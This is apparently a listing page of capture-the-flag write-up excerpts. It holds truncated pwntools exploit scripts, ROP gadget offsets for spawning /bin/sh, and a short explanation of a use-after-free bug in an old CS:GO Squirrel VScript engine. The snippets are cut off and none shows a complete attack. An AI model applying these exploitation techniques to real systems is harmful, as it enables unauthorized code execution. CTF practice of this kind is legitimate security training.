kungfulon

#include <iostream>
#include <fstream>
#include <algorithm>
#include <experimental/filesystem>
#include <cstdlib>

using namespace std;

typedef unsigned int DWORD;
typedef unsigned char BYTE;

kungfulon

Welcome

Discord flag.

Merkle Hellman

Brute force byte-by-byte and apply encrypt function to verify.

from pwn import *

kungfulon

from pwn import *

context.update(os='linux', arch='amd64')

r = process('./minho')
l = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def new(size, data, abuse_scanf=0):
    r.sendlineafter(b'> ', b'1')
    r.sendlineafter(b': ', b'0' * abuse_scanf + str(size).encode())

kungfulon

🔥 Counter Strike: Squirrel Offensive

This challenge involves an old version of CS:GO VScript, which is vulnerable to a UAF bug and a type confusion bug.

UAF by resizing array in sort compare function

The sort function of squirrel array is array_sort in sqbaselib.cpp, which will call _qsort:

// v: VM, o: array object, func: compare func

kungfulon

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

#define INFO "[*] "

kungfulon

#!/usr/bin/env python3

import struct
import sys

libc = int(sys.argv[1], 16) - 0x270b3
setreuid = 0x117ab0
execve = 0xe62f0
binsh = 0x1b75aa
poprdx = 0x11c371

kungfulon

#!/usr/bin/env python3

from pwn import *

context.clear(arch='amd64', os='linux', endian='little')

r = remote('125.235.240.166', 33333)

# 1st boss
r.sendline(b'%p')

kungfulon

#!/usr/bin/env python3

from pwn import *

context.clear(arch='amd64', os='linux', endian='little')
libc = ELF('./libc-2.31.so')
MY_IP = b''

r = remote('125.235.240.166', 20120)

kungfulon

#!/usr/bin/env python3

from pwn import *

context.os = 'linux'
context.arch = 'amd64'

b = ELF('./sandboxd')
l = ELF('./libc-2.31.so')
context.terminal = ['tmux', 'sp', '-h', '-p', '80']

kungfulon

#!/usr/bin/env python3

import sys
import struct
import glob
import os
import tempfile
import subprocess

PRIVATE_KEY_PATH = '/tmp/private_key.pem'